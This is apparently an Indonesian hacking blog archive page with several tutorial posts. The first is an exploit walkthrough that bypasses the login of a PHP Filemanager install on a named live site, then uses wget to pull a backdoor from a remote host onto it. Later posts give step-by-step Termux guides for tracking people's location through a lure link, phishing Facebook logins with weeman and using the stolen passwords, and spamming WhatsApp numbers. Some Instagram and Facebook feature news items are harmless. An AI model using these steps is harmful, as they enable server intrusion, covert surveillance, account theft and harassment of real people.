Home » Archive for 2018

PHP Filemanager Bypass Login And Get RCE Exploit

Add Comment ,

Kali ini aing akan share bagaimana mengexploitasi bisa dibilang Plugins PHP Filemanager dengan bypass login dan tambahan RCE untuk membuat sebuah backdoor didalam. Bagaimana caranya? Simak sampai bawah.

Exploit Title : PHP Filemanager RCE
Tested On : Linux
Live bug : http://malayattoorchurch.com/galerany/phpfm.php

Buka live bug di atas menggunakan Browser Chrome , Mozilla Firefox , ataupun browser yang suka kalian gunakan.


Oke bisa kalian lihat PHP Filemanager di atas , loh kenapa harus masukin password ? tenang saja kita lakukan bypass terlebih dahulu.


Parameter GET: ?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=

Masukan parameter di atas setelah phpfm.php berikut penampakannya :

Wohoo... lanjut kita coba inpiut sebuah backdoor , kita bisa menggunakan fungsi echo, curl ataupun wget. Kali ini saya menggunakan fungsi wget  :

command : wget https://site.com/door.txt
                     wget https://site.com/door.txt -O su.php.accdb

Sekarang kita cek apakah berhasil di wget atau tidak  :


Berhasil , backdoor tertanam pada directory /galery/su.php.accdb inget ya tiap web mungkin berbeda pathnya .

Thanks to: Febrian ID
source: tasik9etar & ur-solution

Related Posts:

Typical Idiot Security Sambangi Website Pemerintah Dari Tiga Daerah

Add Comment
Pagi tadi dikabarkan puluhan website pemerintah disambangi hacker dengan kodename AnoaGhost. Belum diketahui maksud dari peretasan tersebut, dugaan sementara hanya menguji keamaan website tersebut. Dia hanya menitipkan file bernama "tis.html"


AnoaGhost dari team Typical Idiot Security ini diketahui menggunakan proof of concept jenis SQL Injection untuk mengexploitasi.

Website dari tiga daerah mulai dari:
1. Kota Padang
http://lakip.padang.go.id/tis.html

2. Kabupaten Lampung Selatan
http://dinkes.lampungselatankab.go.id/xD.htm
(satu dari beberapa website)

3. Kota Payakumbuh
http://payakumbuhkota.go.id/tis.html 
(satu dari beberapa website)

Berikut mirroring yang masih bisa dilihat
https://zone-h.org/archive/notifier=AnoaGhost
https://zone-h.org/archive/notifier=AnoaGhost/published=0

Sampai berita ini diterbitkan, belum ada perbaikan yang signifikan dari beberapa website tersebut.

Related Posts:

Pengunaan Fitur Scan Name Tag Instagram

Add Comment ,

Instagram baru-baru ini mengeluarkan fitur baru yang memungkinkan seseorang untuk mengikuti/follow akun lain di instagram hanya dengan scan gambar saja.
Fitur ini dikenal dengan nama "Name Tag" atau "Label Nama". Fitur ini sudah dikenalkan oleh Snap Chat sebelumnya. Dimana seseorang dapat menampilkan informasi akun lain hanya dengan scan gambar. Kita juga bisa membagikan gambar kita sendiri agar seseorang dapat mengikuti kita melalui scan.

Berikut ini adalah langkah-langkah menggunakan fitur name tag atau label nama instagram

A. Mendapatkan gambar name tag/label nama ig
1. Masuk ke akun instagram
2. Pilih menu Akun (ikon manusia di pojok kanan bawah)
3. Setelah masuk di halaman profil, pilih Menu Lainnya (Ikon garis 3 horizontal di pojok kanan atas)

4. Setelah itu pilih Name Tag / Label Nama


5 Silahkan save dan share ke teman-teman kamu :)

B. Follow akun orang lain dengan scan gambar IG
1. Silahkan masuk ke menu Name Tag/Label Nama IG seperti yang dijelaskan di point A
2. Lalu di bagian bawah gambar, klik Pindai Label Nama /  Scan Name Tag.


3. Silahkan scan gambar name tag instagram lain
4. Maka ini lah yang akan keluar


Semoga artikel kali ini bermanfaat! Terima Kasih!

Related Posts:

Fitur Baru Instagram, Bisa Berbelanja Dari Video

Add Comment ,

Instagram terus memberikan inovasi untuk berbelanja melalui platform mereka. Tepat hari ini Instagram menambahkan tiga fitur berbelanja di dalam aplikasi.
Semua fitur yang diberikan Instagram bertujuan untuk menciptakan pengalaman yang lebih lengkap, di mana pengguna dapat melakukan sebagian besar belanja mereka melalui satu aplikasi.

Fitur baru pertama, yaitu belanja dari video, satt menonton video dari sebuah akun bisnis di Feed, pengguna bisa mengetuk ikon Shopping di pojok kiri bawah untuk melihat produk-produk yang ditawarkan di konten tersebut.

Kedua adalah opsi untuk simpan gambar. Ketika sedang melihat-lihat lalu menemukan barang yang disukai, pengguna bisa menyimpannya di koleksi Shopping.

Pengguna bisa mengetuk ikon Simpan atau Save di Stories atau Feed, di pojok kanan bawah. Otomatis gambar akan disimpan ke koleksi shopping. Jika ingin melihatnya kembali, sama seperti koleksi lainnya, Shopping dapat diakses lewat profil.

Semua yang disimpan akan diatur dalam baris yang rapi sehingga memudahkan pengguna untuk dapat menggulir apa pun yang disimpan.

Terakhir adalah merancang ulang tab Shop di akun bisnis untuk mempermudah melihat produk yang dipajang. Pengguna bisa ketuk tombol 'shop' di akun bisnis untuk melihat produk.

Dilaporkan The Verge, Jumat (16/11/2018) saat ini memang baru beberapa unggahan tertentu yang dianggap sebagai postingan shopping. Karena tidak semua merek telah memiliki halaman bisnis yang memungkinkan menjual barang melalui unggahan mereka.

Related Posts:

Fitur Baru Facebook Bisa Cegah Komentar Negatif

1 Comment ,

Komentar negatif sangat mudah ditemukan di berbagai platform media sosial. Kalimat negatif tersebut terkadang menyudutkan karena menjadikan seseorang sebagai korban.

Guna mengatasi hal tersebut, Facebook meluncurkan fitur terbaru khusus untuk menghapus komentar negatif. Dikutip dari Android Police, pengguna Facebook bebas menyaring kata, frasa, atau emoji tertentu yang tidak dikehendaki agar tidak muncul di beranda.

Meski demikian, fitur penyaring tersebut tidak akan otomatis aktif di akun pengguna. Sehingga fitur tersebut tidak akan berpengaruh kepada pelaku penyebar komentar negatif dan ujaran kebencian tersebut.

Belakangan ini, Facebook menuai beragam kritikan terkait maraknya persebaran ujaran kebencian. Perusahaan media sosial yang digawangi Mark Zuckerberg itu sebelumnya telah menghapus belasan juta konten negatif.

Pertengahan November 2018, Facebook menghapus sekitar 1,5 miliar akun dan 2,1 miliar spam. Mereka mengatakan banyaknya akun palsu merupakan dampak langsung dari serangan siber.


Facebook juga telah meningkatkan kemampuan dalam mengenali dan mencegah konten berbahaya sebelum pengguna melihat dan melaporkannya.

Related Posts:

Dikabarkan Facebook Akan Hadirkan Fitur Live Shopping

Add Comment ,
Facebook menjadi media sosial dengan pengguna terbanyak di dunia. Dengan banyaknya jumlah pengguna, hal ini bisa dimanfaatkan oleh pengguna yang ingin menjual barang.

Dilansir dari laman Tech Crunch, Sabtu (8/12/2018), Facebook sedang menguji fitur Live Shopping. Fitur ini memungkinkan penjual dapat dengan langsung mempromosikan produk mereka.

Calon pembeli dapat mengambil screenshot langsung dan melakukan pembayaran langsung melalui aplikasi Messenger. Hadirnya fitur ini tersebar melalui unggahan di akun Twitter Jeff Higins.


Facebook juga mengatakan, fitur ini sedang diuji dan baru tersedia di Thailand saja. “Thailand menjadi salah satu komunitas toko belanja online yang paling aktif,” ujar Mayank Yadav, Manajer Marketplace Produk Facebook.



Dalam fitur ini, calon pembeli memperoleh pemahaman lebih mengenai produk yang ditawarkan. Fitur tersebut juga meningkatkan interaksi antar calon pembeli dengan penjual di Facebook.

Nantinya, para pengguna akan mendapatkan notifikasi dari Facebook Pages penjual saat melakukan siaran langsung. Facebook memastikan tidak akan memungut bayaran atas transaksi yang dilakukan.

Facebook belum mengonfirmasi kapan fitur tersebut akan dirilis secara global.

Related Posts:

Melacak Lokasi Seseorang dengan Termux

Add Comment ,
20181204_151000

Hi guys, kali ini saya akan memberi tutorial bagaimana sih cara melacak lokasi orang dengan menggunakan termux?, mungkin beberapa dari kalian pasti pernah kan penasaran dengan lokasi orang lain, untuk itu saya membuat artikel ini yaitu Cara Melacak Lokasi Orang.

Sebelum lanjut ke tutorial nya silahkan persiapkan bahan atau alat yang diperlukan untuk melacak lokasi seseorang, berikut alat atau bahan yang dibutuhkan.

  • Termux ( Download )
  • Device / HP
  • Koneksi Internet

    Setelah kalian mempersiapkan bahan atau alat yang disebutkan diatas, langsung saja kita ke tutorialnya.

    Cara Melacak Lokasi Orang Dengan Menggunakan Termux 100% Akurat

     Catatan : Dengan menggunakan perintah berarti kalian ketik perintah yang diberikan, pada termux kalian.
    1. Pertama, buka aplikasi termux yang sebelumnya sudah kalian install.
    2. Silahkan install PHP dan GIT terlebih dahulu dengan menggunakan perintah :
      3.  pkg install php && pkg install git
    3. Selanjutnya mari kita unduh script pelacak lokasinnya, dengan menggunakan perintah :
      4.  git clone https://github.com/indosecid/gps_tracking
    4. Setelah kalian mengunduh script tools pelacak lokasi, silahkan kalian masuk kedalam folder atau direktori script tersebut, menggunakan perintah :
      5.  cd gps_tracking
    5. Selanjutnya, setelah kalian masuk kedalam direktori script tersebut, silahkan kalian jalankan script nya dengan menggunakan perintah :
      6.  php gps.php
    6. Setelah menjalankan scriptnya, akan muncul pilihan menu seperti GPS , IP dan Phising silahkan pilih GPS dengan cara mengetik --GPS lalu enter.
      IMG_20181204_103737
    7. Lalu kalian akan disuruh untuk mengisi parameter, dan port, silahkan kalian isi parameter terserah kalian, usahakan yang bisa membuat orang tertarik, contohnya PulsaGratis, dan port silahkan isi dengan port 4444 dengan mengetik 4444 lalu enter, atau bisa saja kalian menggunakan port yang lain.
      IMG_20181204_104524
    8. Selanjutnya kalian juga akan disuruh memilih gambar apa yang akan muncul pada link pelacak lokasi, disini saya akan memilih gambar anime saja, jadi kita akan mengetik angka 4.
      IMG_20181204_104615
    9. Nah setelah itu akan muncul link pelacak lokasi, silahkan kalian salin dan sebarkan link tersebut ke target yang ingin kalian lacak, dan suruhlah target untuk membuka link pelacak lokasi tersebut.
      IMG_20181204_104815
    10. Setelah target membuka link tersebut akan muncul link untuk mengakses info lokasi target, dan silahkan kalian buka via browser kalian.
      IMG_20181204_105041
    11. Nah pada link tersebut, akan muncul info lokasi target yang pastinya akurat, lokasi tersebut berupa lokasi dari google maps, disana juga ada info ip dan hp target yang digunakan.
      IMG_20181204_105432-picsay
    Nah itulah cara melacak lokasi orang dengan menggunakan termux, sekian sampai jumpa di artikel menarik lainnya.

    Related Posts:

    Penggunaan Weeman Pada Termux Untuk Phising Facebook

    Add Comment ,
    IMG_20180523_055659-picsay

    Halo guys, ditutorial kali ini saya akan memberi tutorial bagaimana cara phising menggunakan weeman di termux,nah sebelum kita ke tutorialnya kita bahas dulu apa itu phising.
    Phising adalah suatu metode menipu untuk mendapatkan atau mencuri akun korban dengan mengelabui korban untuk mengisi data-data akun korban.
    Itulah sedikit penjelasan tentang Phising,Langsung saja kita ke tutorialnya :


    • Buka Termux
    • Install terlebih dahulu git dengan perintah :
     pkg install git
    • Install juga beautifulsoup4 dengan perintah :
     pip2 install beautifulsoup4

    • Dan juga install python2 dengan perintah :
     pkg install python2 

    • Clone kan weeman dengan perintah :
     git clone https://github.com/samyoyo/weeman.git
    IMG_20180523_055609

    • Pergilah ke folder weeman rengan perintah :
     cd weeman
    IMG_20180523_055635

    • Jalankan weeman dengan perintah
     python2 weeman.py
    IMG_20180523_055659

    • Lalu kita akan set loginnya ke faceebok kalian juga bisa menggantinya dengan instagram atau yang lainnya.Jalankan lah dengan perintah :
     set url http://www.facebook.com

    • Lalu kita set port nya ( disini saya menggunakan port 8080 ) dengan perintah :
     set port 8080

    • Setelah itu kita set link actionnya dengan perintah :
     set action_url https://facebook.com

    • Selanjutnya kita jalankan dengan perintah :
     run
    IMG_20180523_055729

    • Bukalah sesi baru untuk melihat ip kita dengan perintah :
     ifconfig
    IMG_20180523_061028
    Nah yang saya blok itu adalah ip saya.

    • Setelah kita melihat ip kita sendiri kalian tinggal membukanya di browser kalian dengan ipkalian:8080, seperti gambar dibawah ini saya menggunakan ip saya yang diatas.
    IMG_20180523_061342

    • Setelah itu kalian tinggal membagikan url kalian ke pada teman ataupun orang lain dengan rayuan kalian :D untuk mengisi nya.
    • Jika sudah ada yang mengisi/tertipu akan muncul pada weeman kalian pada termux, seperti gambar dibawah ini.
    IMG_20180523_061748-picsay
    Setelah korban tertipu ya kalian tinggal login menggunakan email,password yang muncul :D.
    Sampai jumpa Happy Hacking ;D.

    Related Posts:

    Tools Spam Chat Whatsapp Terbaru Work di Termux

    Add Comment ,
    Spam Whatsapp 100% Work, kali ini saya akan membagikan tutorial yang mungkin banyak diminati oleh kalian..

    ada beberapa macam seperti :


    1. Hack Facebook
    2. Auto Like Facebook
    3. Bot Comment Facebook
    4. Spammer


    Nah, untuk kali ini saya akan kasih tutorial untuk Spam, udah biasa? eiiitss yang ini lain.. bukan untuk spam nomor telpon, tapi untuk spam Whatsapp tanpa orang tersebut tau kalau kita yang mengirim..
    Okk, langsung aja ke tutorialnya, Cekidot.

    SPAM WHATSAPP DENGAN TERMUX

    pertama, silahkan kalian download dulu aplikasi termuxnya di playstore.


    Setelah kalian selesai download.. Install satu persatu Command di bawah ini (tanpa $).


     $ apt update && apt upgrade
    $ pkg install php figlet ruby lolcat gem python2 git
    $ git clone https://github.com/Rusmana-ID/rus
    $ cd rus
    $ sh v2.sh


    Jika semua sudah di run maka akan muncul menu login disuruh masukan username dan password .


     Username : Rusmana
    Password : X-One

     

    Selanjutnya , kalian ketik nomor 2 lalu enter... maka tampilan nya akan seperti ini :


    lalu, kalian tinggal mengisi nomor target yang ingin kalian spam whatsapp nya lalu enter, nnti akan ada pertanyaan pilihan seperti di gambar, kalian ketik saja "Y" lalu enter

    Setelah targer berhasil di kunci, silahkan kalian masukan jumlah spam yang kalian inginkan, 100 misalnya :) lalu tekan enter dan tunggu prosesnya sampai selesai, dan spam tersebut akan masuk ke whatsapp korban sebanyak yang kalian inginkan tadi seperti di gambar

    okee, sekian tutorial dari saya.. semoga bermanfaat.

    Note : Untuk tools lainnya silakan kalian coba sendiri yaa.

    Related Posts:

    Subscribe to: Posts (Atom)